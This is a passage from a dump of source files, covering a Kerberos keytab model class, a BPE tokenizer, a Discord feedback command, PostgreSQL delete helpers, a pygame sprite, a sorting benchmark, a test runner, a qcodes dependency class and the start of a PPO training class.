kerberos domain controller to generate the keytab.\n\n :param encryption_type: The encryption_type of this Keytab.\n :type: str\n \"\"\"\n\n self._encryption_type = encryption_type\n\n @property\n def fqdn(self):\n \"\"\"\n Gets the fqdn of this Keytab.\n The fully qualified domain name to which the keytab was issued.\n\n :return: The fqdn of this Keytab.\n :rtype: str\n \"\"\"\n return self._fqdn\n\n @fqdn.setter\n def fqdn(self, fqdn):\n \"\"\"\n Sets the fqdn of this Keytab.\n The fully qualified domain name to which the keytab was issued.\n\n :param fqdn: The fqdn of this Keytab.\n :type: str\n \"\"\"\n\n self._fqdn = fqdn\n\n @property\n def kvno(self):\n \"\"\"\n Gets the kvno of this Keytab.\n The key version number of the key used to generate the keytab.\n\n :return: The kvno of this Keytab.\n :rtype: int\n \"\"\"\n return self._kvno\n\n @kvno.setter\n def kvno(self, kvno):\n \"\"\"\n Sets the kvno of this Keytab.\n The key version number of the key used to generate the keytab.\n\n :param kvno: The kvno of this Keytab.\n :type: int\n \"\"\"\n\n self._kvno = kvno\n\n @property\n def prefix(self):\n \"\"\"\n Gets the prefix of this Keytab.\n The prefix in the name of the keytab object. This is the same for all keytab objects created from a single keytab file. The name of a keytab entry is created in the format `<prefix>.<suffix>` for all entries.\n\n :return: The prefix of this Keytab.\n :rtype: str\n \"\"\"\n return self._prefix\n\n @prefix.setter\n def prefix(self, prefix):\n \"\"\"\n Sets the prefix of this Keytab.\n The prefix in the name of the keytab object. This is the same for all keytab objects created from a single keytab file. The name of a keytab entry is created in the format `<prefix>.<suffix>` for all entries.\n\n :param prefix: The prefix of this Keytab.\n :type: str\n \"\"\"\n\n self._prefix = prefix\n\n @property\n def principal(self):\n \"\"\"\n Gets the principal of this Keytab.\n The service name for which the keytab was issued.\n\n :return: The principal of this Keytab.\n :rtype: str\n \"\"\"\n return self._principal\n\n @principal.setter\n def principal(self, principal):\n \"\"\"\n Sets the principal of this Keytab.\n The service name for which the keytab was issued.\n\n :param principal: The principal of this Keytab.\n :type: str\n \"\"\"\n\n self._principal = principal\n\n @property\n def realm(self):\n \"\"\"\n Gets the realm of this Keytab.\n The kerberos realm that issued the keytab.\n\n :return: The realm of this Keytab.\n :rtype: str\n \"\"\"\n return self._realm\n\n @realm.setter\n def realm(self, realm):\n \"\"\"\n Sets the realm of this Keytab.\n The kerberos realm that issued the keytab.\n\n :param realm: The realm of this Keytab.\n :type: str\n \"\"\"\n\n self._realm = realm\n\n @property\n def suffix(self):\n \"\"\"\n Gets the suffix of this Keytab.\n The suffix in the name of the keytab object, determined at creation time using the slot number of the keytab entry in a file and the number of existing entries with the same prefix. The name of a keytab entry is created in the format `<prefix>.<suffix>` for all entries.\n\n :return: The suffix of this Keytab.\n :rtype: int\n \"\"\"\n return self._suffix\n\n @suffix.setter\n def suffix(self, suffix):\n \"\"\"\n Sets the suffix of this Keytab.\n The suffix in the name of the keytab object, determined at creation time using the slot number of the keytab entry in a file and the number of existing entries with the same prefix. The name of a keytab entry is created in the format `<prefix>.<suffix>` for all entries.\n\n :param suffix: The suffix of this Keytab.\n :type: int\n \"\"\"\n\n self._suffix = suffix\n\n def to_dict(self):\n \"\"\"\n Returns the model properties as a dict\n \"\"\"\n result = {}\n\n for attr, _ in iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"\n Returns the string representation of the model\n \"\"\"\n return pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"\n For `print` and `pprint`\n \"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"\n Returns true if both objects are equal\n \"\"\"\n if not isinstance(other, Keytab):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"\n Returns true if both objects are not equal\n \"\"\"\n return not self == other\n","sub_path":"purity_fb/purity_fb_1dot11/models/keytab.py","file_name":"keytab.py","file_ext":"py","file_size_in_byte":9552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"98827458","text":"\"\"\"Implementation of (byte-level) bpe.\n\nThe tokenizer splits by spaces to construct a vocabulary. All words then use space\nas an end of word symbol. All words are encoded to bytes via utf-8, after which\nbpe can be applied.\n\nThe implementation uses a cache for blocks of words to quickly filter out blocks\nwithout specific pairs.\n\nvocab - during compression, refers to list of (word, count)\nword - during compression, this is a tuple of ids\nbase_vocab - this is a list of byte strings, the index is the id\npairs - during compression, pair -> count\ncache - during compression, list of pair -> count for each block\n\nAuthor:\n Jeffrey Shen\n\"\"\"\n\nimport collections\nimport copy\nimport heapq\nfrom tqdm import tqdm\n\nclass TopCounter:\n \"\"\"Counter, but O(log n)ish to get the top element\"\"\"\n\n def __init__(self):\n self.counter = collections.Counter()\n self.heap = []\n\n def update(self, counter):\n self.counter.update(counter)\n for k in counter:\n if k in self.counter and self.counter[k] == 0:\n del self.counter[k]\n\n if k in self.counter:\n heapq.heappush(self.heap, (-self.counter[k], k))\n \n \n def subtract(self, counter):\n self.counter.subtract(counter)\n for k in counter:\n if k in self.counter and self.counter[k] == 0:\n del self.counter[k]\n\n if k in self.counter:\n heapq.heappush(self.heap, (-self.counter[k], k))\n\n def __len__(self):\n return len(self.counter)\n\n def pop(self):\n while len(self.heap) > 0:\n count, k = heapq.heappop(self.heap)\n count = -count\n if k not in self.counter:\n continue\n\n if self.counter[k] == 0:\n raise RuntimeError(\"Wtf! Invariant violated\")\n\n # Make sure still valid\n if self.counter[k] != count:\n continue\n\n return k, count\n\n return None, None\n \n \n\ndef get_vocab_from_dict(lines, tokenizer):\n \"\"\"Gets a vocab from a dict of lines to their count.\n\n Returns:\n vocab (list): (word as a tuple of int, count), sorted descending by count\n \"\"\"\n vocab = collections.Counter()\n\n for line, count in lines.items():\n words = tokenizer.tokenize(line)\n for word in words:\n vocab[word] += count\n\n vocab = list(vocab.items())\n vocab.sort(key=lambda k: k[1], reverse=True)\n return vocab\n\n\ndef get_stats(vocab, l1_block_size, l2_block_size):\n pairs = TopCounter()\n l1 = []\n l2 = []\n for ind, (word, count) in enumerate(vocab):\n if ind % l1_block_size == 0:\n l1.append(collections.Counter())\n if ind % l2_block_size == 0:\n l2.append(collections.Counter())\n add_stats_for_word(word, count, l1[-1])\n add_stats_for_word(word, count, l2[-1])\n for block in l1:\n pairs.update(block)\n return pairs, l1, l2\n\n\ndef add_stats_for_word(word, count, counter):\n for i in range(len(word) - 1):\n counter[word[i], word[i + 1]] += count\n\n\ndef contains_pair(word, pair):\n for i in range(len(word) - 1):\n if (word[i], word[i + 1]) == pair:\n return True\n return False\n\n\ndef replace_pair(word, pair, num):\n next = []\n for i in range(len(word)):\n next.append(word[i])\n if len(next) < 2:\n continue\n if (next[-2], next[-1]) == pair:\n next.pop()\n next[-1] = num\n return tuple(next)\n\n\ndef subtract_counters(counter_a, counter_b):\n counter_a.subtract(counter_b)\n for k in counter_b:\n if k in counter_a and counter_a[k] == 0:\n del counter_a[k]\n\n\ndef merge_vocab(vocab, best, num, pairs, l1, l2, l1_bs, l2_bs):\n hit1 = 0\n miss1 = 0\n hit2 = 0\n miss2 = 0\n for i in range(0, len(vocab), l2_bs):\n c2 = l2[i // l2_bs]\n hit2 += 1\n if best not in c2:\n continue\n if c2[best] == 0:\n continue\n\n hit2 -= 1\n miss2 += 1\n\n for j in range(i, min(len(vocab), i + l2_bs), l1_bs):\n c1 = l1[j // l1_bs]\n hit1 += 1\n if best not in c1:\n continue\n if c1[best] == 0:\n continue\n hit1 -= 1\n miss1 += 1\n\n for v in range(j, min(len(vocab), j + l1_bs), 1):\n word, count = vocab[v]\n\n if not contains_pair(word, best):\n continue\n\n diff = collections.Counter()\n add_stats_for_word(word, count, diff)\n next = replace_pair(word, best, num)\n sub = collections.Counter()\n add_stats_for_word(next, count, sub)\n subtract_counters(diff, sub)\n subtract_counters(c1, diff)\n subtract_counters(c2, diff)\n pairs.subtract(diff)\n\n vocab[v] = (next, count)\n\n return hit1, miss1, hit2, miss2\n\n\ndef learn_bpe(vocab, max_length, base_vocab, l1_bs=16, l2_bs=256):\n \"\"\"Performs bpe and returns the merge list.\n\n Returns:\n merges (list): (id pair, id result, count)\n vocab (list): (encoded word, count)\n \"\"\"\n vocab = copy.deepcopy(vocab)\n last = len(base_vocab)\n merges = []\n pairs, l1, l2 = get_stats(vocab, l1_bs, l2_bs)\n\n with tqdm(range(last, max_length)) as pbar:\n for i in pbar:\n if len(pairs) == 0:\n break\n best, count = pairs.pop()\n if best == None:\n raise RuntimeError(\"Never should happen!\")\n\n merges.append((best, i, count))\n hit1, miss1, hit2, miss2 = merge_vocab(\n vocab, best, i, pairs, l1, l2, l1_bs, l2_bs\n )\n pbar.set_postfix(\n {\n \"hit2\": hit2,\n \"miss2\": miss2,\n \"hit1\": hit1,\n \"miss1\": miss1,\n \"pairs\": len(pairs),\n }\n )\n\n return merges, vocab","sub_path":"preprocess/bpe_utils.py","file_name":"bpe_utils.py","file_ext":"py","file_size_in_byte":6067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"116141059","text":"import discord\nfrom Core.Fonctions.Embeds import exeErrorExcept,embedAssert\n\n\nasync def exeFeedback(ctx,bot,args):\n \"\"\"Cette fonction permet d'envoyer un message à OlborEgamorf et de donner des feedbacks sur le Bot.\n \n En argument avec la commande est donné une phrase commentaire.\n \n La phrase est ensuite envoyée dans un salon privé sur le serveur de test du bot.\"\"\"\n try:\n assert len(args)>0, \"Votre message est vide !\"\n phrase=\"\"\n for i in args:\n phrase+=\" \"+i\n embedTable=discord.Embed(title=\"<:otVERT:868535645897912330> Message envoyé :\", description=phrase, color=0x339966)\n embedTable.set_footer(text=\"OT!feedback - {0} - {1}\".format(ctx.author.name,ctx.author.id))\n await bot.get_channel(737041049939345408).send(embed=embedTable)\n except AssertionError as er:\n embedTable=embedAssert(str(er))\n except:\n embedTable=await exeErrorExcept(ctx,bot,args)\n await ctx.send(embed=embedTable)\n return","sub_path":"Autre/Feedback.py","file_name":"Feedback.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"405996959","text":"# Pedro Furtado (pnf@dei.uc.pt), Bases de Dados 2018/2019, \n# baseado no exemplo em\n# http://www.postgresqltutorial.com/postgresql-python\n\nimport psycopg2\nimport sys\n\n#======================= delete tables with one primary key ===============================\ndef delete_1key(aux,myid):\n\n if aux == 'banda':\t\t\n commands = (\n \"\"\" DELETE FROM banda where idbanda=%s\"\"\"\n\t\t )\n elif aux == 'album':\n commands = (\n \"\"\" DELETE FROM album where idalbum=%s\"\"\"\n\t\t )\n elif aux == 'musica':\n commands = (\n \"\"\" DELETE FROM musica where idmusica=%s\"\"\"\n\t\t )\n elif aux == 'compositor':\n commands = (\n \"\"\" DELETE FROM compositor where idcompositor=%s\"\"\"\n\t\t )\n elif aux == 'membro':\n commands = (\n \"\"\" DELETE FROM membro where idmembro=%s\"\"\"\n\t\t )\n elif aux == 'playlist':\n commands = (\n \"\"\" DELETE FROM playlist where idplaylist=%s\"\"\"\n\t\t )\n elif aux == 'utilizador':\n commands = (\n \"\"\" DELETE FROM utilizador where username=%s\"\"\"\n\t\t )\n try:\n\n conn = psycopg2.connect(host=\"localhost\",database=\"Projeto\", user=\"postgres\", password=\"postgres\")\n cur = conn.cursor()\n cur.execute(commands, (myid,))\n # close communication with the PostgreSQL database server\n cur.close()\n # commit the changes\n conn.commit()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n \n#======================= delete tables with two primary key ===============================\ndef delete_2key(aux,myid1,myid2):\n\n if aux == 'concertos':\t\t\n commands = (\n \"\"\" DELETE FROM concertos where idbanda=%s and datahora=%s\"\"\"\n\t\t )\n elif aux == 'critalbum':\n commands = (\n \"\"\" DELETE FROM critalbum where username=%s and idalbum=%s\"\"\"\n\t\t )\n elif aux == 'critmusica':\n commands = (\n \"\"\" DELETE FROM critmusica where username=%s and idmusica=%s\"\"\"\n\t\t )\n elif aux == 'critbanda':\n commands = (\n \"\"\" DELETE FROM critbanda where username=%s and idbanda=%s\"\"\"\n\t\t )\n elif aux == 'genero':\n commands = (\n \"\"\" DELETE FROM genero where idmusica=%s and nome_genero=%s\"\"\"\n\t\t )\n elif aux == 'membro_banda':\n commands = (\n \"\"\" DELETE FROM membro_banda where idmembro=%s and idbanda=%s\"\"\"\n\t\t )\n elif aux == 'compositor_musica':\n commands = (\n \"\"\" DELETE FROM compositor_musica where idcompositor=%s and idmusica=%s\"\"\"\n\t\t )\n elif aux == 'compositor_membro':\n commands = (\n \"\"\" DELETE FROM compositor_membro where idcompositor=%s and idmembro=%s\"\"\"\n\t\t )\n elif aux == 'playlist_musica':\n commands = (\n \"\"\" DELETE FROM playlist_musica where idmusica=%s and idplaylist=%s\"\"\"\n\t\t )\n elif aux == 'ficheiros':\n commands = (\n \"\"\" DELETE FROM ficheiros where idmusica=%s and username=%s\"\"\"\n\t\t )\n try:\n\n conn = psycopg2.connect(host=\"localhost\",database=\"Projeto\", user=\"postgres\", password=\"postgres\")\n cur = conn.cursor()\n cur.execute(commands, (myid1,myid2,))\n # close communication with the PostgreSQL database server\n cur.close()\n # commit the changes\n conn.commit()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n","sub_path":"delete_values.py","file_name":"delete_values.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"285140503","text":"__author__ = 'Kirill Korovin'\n\nimport pygame\nimport random\n\n\nclass Fish(pygame.sprite.Sprite):\n\n def __init__(self, *groups):\n super(Fish, self).__init__(*groups)\n self.direction = 1\n self.image = pygame.image.load('images/fish.png')\n self.image = pygame.transform.flip(self.image, False, True)\n self.rect = pygame.Rect((random.randrange(10, 430, 10), 600), self.image.get_size())\n self.flag = True\n\n def update(self, dt):\n if self.rect.y > random.randrange(20,360,20) and self.direction == 1:\n self.rect.y -= 300 * dt\n else:\n self.direction = 2\n if self.rect.y < 600 and self.direction == 2:\n self.image = pygame.image.load('images/fish.png')\n self.rect.y += 300 * dt\n else:\n self.direction = 3","sub_path":"fish.py","file_name":"fish.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"609912366","text":"#!/usr/bin/python\n\nimport random\nimport numpy as np\nfrom datetime import datetime \nimport time\nimport timeit\nimport matplotlib.pyplot as plt\nfrom insertionSort import insertionSort\nfrom mergeSort import mergeSort\nfrom heapSort import heapSort\nfrom quickSort import quickSort\nfrom modifiedQuickSort import modifiedQuickSort\n\n\ndef calculateAvg(func,execTime,INPUT_SIZE,sorting_type):\n\n FuncName = {\n 'insert':insertionSort,\n 'merge':mergeSort,\n 'heap':heapSort,\n 'quick':quickSort,\n 'modifiedQuick':modifiedQuickSort\n\n }\n #### Should be Taking average for 3 dataset\n Num_Of_Case = 1\n timeElapsed = 0\n sortingName = FuncName[func]\n #alg = FuncName.get(func,lambda:\"Invalid Function\")\n\n data_type = {\n 1: \"_sorted\",\n 2: \"_reverse\",\n 3: \"\"\n }\n\n for i in range(1,Num_Of_Case+1) :\n arr = []\n inputFile = open(\"DataSet/dataSet\" + str(i) + data_type.get(sorting_type) + \".txt\", \"r\")\n arr = np.loadtxt(inputFile,dtype=int,max_rows=INPUT_SIZE)\n #print(arr)\n inputFile.close()\n startTime = time.time()\n sortingName(arr,0,len(arr)-1)\n timeElapsed = timeElapsed + time.time()-startTime\n outputFile = open(\"Result/\"+func+\"_\"+str(INPUT_SIZE)+\"_\"+str(i)+\".txt\",\"w\")\n outputFile.writelines(\"%s\\n\" %item for item in arr)\n outputFile.close()\n timeElapsed = timeElapsed/Num_Of_Case\n execTime.append(timeElapsed)\n print ('Time elapsed in Execution of '+func+' : '+str(timeElapsed)+'seconds')\n\ndef main() :\n\n # print(\"Select Sorting Algorithm to test :\")\n # print(\"1. Insertion Sort\")\n # print(\"2. Merge Sort\")\n # print(\"3. Heap Sort\")\n # print(\"4. In-Place Quick Sort\")\n # print(\"5. Modified Quick Sort\")\n # print(\"6. All Sorting Algorithms\")\n print(\"1. sorted\")\n print(\"2. reversely sorted\")\n print(\"3. Random inputs\")\n sorting_type = int(input(\"how do you want the inputs to be:\"))\n func = []\n # while len(func)==0 :\n # \talgorithm = input(\"Enter the Algorithm number :\")\n # \tif algorithm ==6 :\n # \t\tfunc = [item for item in range(1,7)]\n # \t\tbreak\n # \tif (algorithm>=1 or algorithm<=5) :\n # \t\tfunc.append(algorithm)\n # \t\tbreak\n # \tprint(\"Please Enter valid Input\")\n # print(\"selected:\",func)\n #\n\n size = [1000,2000,3000,4000,5000,10000,20000,30000,40000,50000]\n #size = [1000]\n #print(\"Random Genaration of DATASET started\")\n\n #for num in range(1,4):\n #\tINPUT_SIZE = 50000\n #\tinputFile = open(\"DataSet/dataSet\"+str(num)+\".txt\",\"w\")\n #\tinputFile.writelines(\"%s\\n\" %random.randint(0,INPUT_SIZE) for x in range(0,INPUT_SIZE))\n #\tinputFile.close()\n\n print(\"Random Genaration of DATASET Ended --\")\n\n insert = []\n merge = []\n heap = []\n quick = []\n modifiedQuick = []\n\n for num in size:\n print(\"\\n For input size of :\"+str(num))\n #\tcalculateAvg('insert',insert,num, sorting_type)\n calculateAvg('merge',merge,num, sorting_type)\n calculateAvg('heap',heap,num, sorting_type)\n calculateAvg('quick',quick,num, sorting_type)\n #\tcalculateAvg('modifiedQuick',modifiedQuick,num, sorting_type)\n\n print(insert)\n print(merge)\n print(heap)\n print(quick)\n print(modifiedQuick)\n\n #plt.plot(size, insert, label = \"Insertion Sort\")\n plt.plot(size, merge, label = \"Merge Sort\")\n plt.plot(size, heap, label = \"Heap Sort\")\n plt.plot(size, quick, label = \"Quick Sort\")\n #plt.plot(size, modifiedQuick, label = \"Modified Sort\")\n plt.xlabel('x - axis')\n plt.ylabel('y - axis')\n plt.title('Two lines on same graph!')\n plt.legend()\n plt.show()\n\nif __name__ == \"__main__\" :\n main()\n","sub_path":"compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"603808151","text":"from QtCore import *\nfrom QtGui import *\n\nfrom gamebuttoncontrol import GameButtonControl\nfrom button import Button\n\nclass GameRoomControl(GameButtonControl):\n ANIMATION_SHOW_BACK_BUTTON_DURATION_PHASE_ONE = GameButtonControl.ANIMATION_SHOW_LEFT_BUTTON_DURATION_PHASE_ONE\n ANIMATION_SHOW_BACK_BUTTON_DURATION_PHASE_TWO = GameButtonControl.ANIMATION_SHOW_LEFT_BUTTON_DURATION_PHASE_TWO\n\n ANIMATION_SHOW_START_BUTTON_DURATION_PHASE_ONE = GameButtonControl.ANIMATION_SHOW_RIGHT_BUTTON_DURATION_PHASE_ONE\n ANIMATION_SHOW_START_BUTTON_DURATION_PHASE_TWO = GameButtonControl.ANIMATION_SHOW_RIGHT_BUTTON_DURATION_PHASE_TWO\n\n backButtonClicked = Signal()\n startButtonClicked = Signal()\n\n def __init__(self, parent):\n super(GameRoomControl, self).__init__(parent)\n self.backButton = Button('Back', False, True, False, self)\n self.startButton = Button('Start', False, True, False, self)\n\n self.backButton.resize(GameButtonControl.SIZE_BUTTON)\n self.startButton.resize(GameButtonControl.SIZE_BUTTON)\n\n self.backButton.move(GameButtonControl.POS_LEFT_BUTTON)\n self.startButton.move(GameButtonControl.POS_RIGHT_BUTTON_TWO)\n\n self.backButton.clicked.connect(self.backButtonClicked)\n self.startButton.clicked.connect(self.startButtonClicked)\n\n @Slot()\n def _startAnimation(self):\n self.backButton.hide()\n self.startButton.hide()\n\n # delay\n delayAnimation = QPauseAnimation()\n delayAnimation.setDuration(GameRoomControl.ANIMATION_INITIAL_DELAY)\n delayAnimation.finished.connect(self.backButton.show)\n delayAnimation.finished.connect(self.startButton.show)\n\n # back button\n showBackButtonAnimationGroup = self._showLeftButtonAnimation(self.backButton,\n GameRoomControl.ANIMATION_SHOW_BACK_BUTTON_DURATION_PHASE_ONE, \n GameRoomControl.ANIMATION_SHOW_BACK_BUTTON_DURATION_PHASE_TWO)\n\n # start button\n showStartButtonAnimationPhaseOne = QPropertyAnimation(self.startButton, 'pos')\n showStartButtonAnimationPhaseOne.setDuration(GameRoomControl.ANIMATION_SHOW_START_BUTTON_DURATION_PHASE_ONE)\n endPos = GameButtonControl.POS_RIGHT_BUTTON_TWO - QPoint(0, GameRoomControl.ANIMATION_BUTTON_DROP)\n startPos = QPoint(self.width(), endPos.y())\n showStartButtonAnimationPhaseOne.setStartValue(startPos)\n showStartButtonAnimationPhaseOne.setEndValue(endPos)\n showStartButtonAnimationPhaseOne.setEasingCurve(QEasingCurve.Linear)\n\n showStartButtonAnimationPhaseTwo = QPropertyAnimation(self.startButton, 'pos')\n showStartButtonAnimationPhaseTwo.setDuration(GameRoomControl.ANIMATION_SHOW_START_BUTTON_DURATION_PHASE_TWO)\n startPos = endPos\n endPos = GameButtonControl.POS_RIGHT_BUTTON_TWO\n showStartButtonAnimationPhaseTwo.setStartValue(startPos)\n showStartButtonAnimationPhaseTwo.setEndValue(endPos)\n showStartButtonAnimationPhaseTwo.setEasingCurve(QEasingCurve.Linear)\n\n showStartButtonAnimationGroup = QSequentialAnimationGroup()\n showStartButtonAnimationGroup.addAnimation(showStartButtonAnimationPhaseOne)\n showStartButtonAnimationGroup.addAnimation(showStartButtonAnimationPhaseTwo)\n\n # all buttons\n showButtonsAnimationGroup = QParallelAnimationGroup()\n showButtonsAnimationGroup.addAnimation(showBackButtonAnimationGroup)\n showButtonsAnimationGroup.addAnimation(showStartButtonAnimationGroup)\n\n self.showAnimationGroup = QSequentialAnimationGroup()\n self.showAnimationGroup.addAnimation(delayAnimation)\n self.showAnimationGroup.addAnimation(showButtonsAnimationGroup)\n self.showAnimationGroup.start(QAbstractAnimation.DeleteWhenStopped)\n\n","sub_path":"gui/gameroomcontrol.py","file_name":"gameroomcontrol.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"129222245","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import linear_model\r\nfrom sklearn.metrics import mean_absolute_error\r\n\r\n# data: dataframe\r\ndata = pd.read_csv('objectFile.csv')\r\n\r\n# divide each dimension's value\r\nXY = data[['Input', 'Output']].values.reshape(-1, 2)\r\nZ = data['Cost']\r\n\r\nx = XY[:, 0]\r\ny = XY[:, 1]\r\nz = Z\r\n\r\n# prepare data point for visualize model(2d)\r\nnum_point = 30\r\nx_range = np.arange(min(x), max(x), (max(x) - min(x))/num_point)\r\ny_range = np.arange(min(y), max(y), (max(y) - min(y))/num_point)\r\n\r\n# made 2d-grid, num of points is num_point * num_point\r\n# x_points, y_points are 2d-list\r\nx_points, y_points = np.meshgrid(x_range, y_range)\r\nmodel_viz = np.array([x_points.flatten(), y_points.flatten()]).T\r\n\r\n# train using sklearn's LinR model, using ols, ols: ordinary least squares,\r\nols = linear_model.LinearRegression()\r\nmodel = ols.fit(XY, Z)\r\npredicted = model.predict(model_viz)\r\n\r\n# evaluate model\r\nr2 = model.score(XY, Z)\r\n\r\nfig = plt.figure(figsize=(16, 5))\r\n\r\n# 1, 3, 1: add subplot between 1 and 3, on 1\r\nax1 = fig.add_subplot(1, 3, 1, projection='3d')\r\nax2 = fig.add_subplot(1, 3, 2, projection='3d')\r\nax3 = fig.add_subplot(1, 3, 3, projection='3d')\r\naxes = [ax1, ax2, ax3]\r\n\r\n# measure mean absolute error\r\nmae = mean_absolute_error(Z, model.predict(XY))\r\n\r\nfor ax in axes:\r\n # plot experimental data\r\n ax.plot(x, y, z, color='black', zorder=15, linestyle='none', marker='o', alpha=0.5)\r\n # plot model\r\n ax.scatter(x_points.flatten(), y_points.flatten(), predicted, color='white', s=20, edgecolor='#70b3f0')\r\n\r\n ax.set_xlabel('Input RDD (MB)', fontsize=12)\r\n ax.set_ylabel('Output RDD (MB)', fontsize=12)\r\n ax.set_zlabel('Cost (sec)', fontsize=12)\r\n\r\n\r\nax1.view_init(elev=28, azim=120)\r\nax2.view_init(elev=4, azim=114)\r\nax3.view_init(elev=60, azim=165)\r\n\r\neq_str = '$: %.8fX_i + %.8fX_o + %.8f$, ' % (model.coef_[0], model.coef_[1], model.intercept_)\r\nerr_str = '$R^2 = %.3f, MAE = $%.3f sec' % (r2, mae)\r\nfig.suptitle(eq_str + err_str, fontsize=15)\r\nfig.tight_layout()\r\n\r\nplt.show()\r\n","sub_path":"visualization_practice/3d_scatter/scatter.py","file_name":"scatter.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"353624510","text":"from datetime import datetime\nfrom os import path\nfrom subprocess import Popen, PIPE\nfrom sys import exit\n\nLOG_FILE = path.basename(__file__) + '.log'\n\n\ndef run(*args: str):\n print('cmd:', args)\n with open(LOG_FILE, 'a') as f1:\n f1.write('\\n' + str(args))\n\n p = Popen(args, shell=True, stdout=PIPE, stderr=PIPE)\n o, e = p.communicate()\n output = o.decode(\"utf-8\").replace('\\r', '')\n errs = e.decode(\"utf-8\").replace('\\r', '')\n\n with open(LOG_FILE, 'a') as f2:\n if len(output) > 0:\n f2.write('\\n' + output)\n print(output)\n if len(errs) > 0:\n f2.write('\\n' + 15 * 'ERR---' + '\\n' + errs)\n print(15 * 'ERR---', '\\n', errs)\n exit(1)\n\n\nif __name__ == '__main__':\n with open(LOG_FILE, 'w') as f:\n f.write(str(datetime.now()))\n run(r'..\\python-venv\\Scripts\\activate.bat')\n run('pytest', 'tests/')\n run(r'..\\python-venv\\Scripts\\deactivate.bat')\n print('done')\n","sub_path":"translator/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"570336339","text":"from typing import Dict, Any\n\nfrom qcodes.dataset.param_spec import ParamSpec\n\n\nclass InterDependencies:\n \"\"\"\n Object containing the ParamSpecs of a given run\n \"\"\"\n\n def __init__(self, *paramspecs: ParamSpec) -> None:\n\n for paramspec in paramspecs:\n if not isinstance(paramspec, ParamSpec):\n raise ValueError('Got invalid input. All paramspecs must be '\n f'ParamSpecs, but {paramspec} is of type '\n f'{type(paramspec)}.')\n\n self.paramspecs = paramspecs\n\n def __repr__(self) -> str:\n output = self.__class__.__name__\n tojoin = (str(paramspec) for paramspec in self.paramspecs)\n output += f'({\", \".join(tojoin)})'\n return output\n\n def __eq__(self, other) -> bool:\n if not isinstance(other, InterDependencies):\n return False\n if not self.paramspecs == other.paramspecs:\n return False\n return True\n\n def serialize(self) -> Dict[str, Any]:\n \"\"\"\n Return a serialized version of this object instance\n \"\"\"\n ser = {}\n ser['paramspecs'] = tuple(ps.serialize() for ps in self.paramspecs)\n return ser\n\n @classmethod\n def deserialize(cls, ser: Dict[str, Any]) -> 'InterDependencies':\n \"\"\"\n Create an InterDependencies object from a serialization of an\n instance\n \"\"\"\n paramspecs = [ParamSpec.deserialize(sps) for sps in ser['paramspecs']]\n idp = cls(*paramspecs)\n return idp\n","sub_path":"qcodes/dataset/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"608544653","text":"\nimport random\nimport os\n\nimport torch\nimport torch.nn as nn\n\nfrom src.problem.portfolio.learning.actor_critic import ActorCritic\n\n\nclass BrainPPO:\n \"\"\"\n Definition of the PPO Brain, computing the DQN loss\n \"\"\"\n def __init__(self, args, n_feat):\n \"\"\"\n Initialize the PPO Brain\n :param args: argparse object taking hyperparameters\n :param n_feat: number of features on the items\n \"\"\"\n self.args = args\n self.policy = ActorCritic(self.args, n_feat)\n self.policy_old = ActorCritic(self.args, n_feat)\n self.policy_old.load_state_dict(self.policy.state_dict())\n\n self.optimizer = torch.optim.Adam(self.policy.parameters(), lr=args.learning_rate)\n self.MseLoss = nn.MSELoss()\n\n if args.mode == 'gpu':\n self.policy.cuda()\n self.policy_old.cuda()\n\n def update(self, memory):\n \"\"\"\n Compute the loss and update the NN weights through backpropagation of the loss\n :param memory: the replay-memory of samples\n \"\"\"\n\n # accumulated rewards collected on the current episodes for each sample of the memory:\n rewards = []\n acc_reward = 0\n\n for reward, is_terminal in zip(reversed(memory.rewards), reversed(memory.is_terminals)):\n if is_terminal:\n acc_reward = 0\n acc_reward = reward + acc_reward\n rewards.insert(0, acc_reward)\n\n # Optimize the policy for K epochs:\n for k in range(self.args.k_epochs):\n\n mem = list(zip(memory.actions, memory.availables, memory.states, memory.log_probs, rewards))\n random.shuffle(mem)\n mem_actions, mem_availables, mem_states, mem_log_probs, mem_rewards = zip(*mem)\n\n n_batch = self.args.update_timestep // self.args.batch_size\n\n for j in range(n_batch):\n\n start_idx = j * self.args.batch_size\n end_idx = (j + 1) * self.args.batch_size - 1\n\n old_states_for_action = torch.stack(mem_states[start_idx:end_idx])\n old_states_for_value = torch.stack(mem_states[start_idx:end_idx])\n 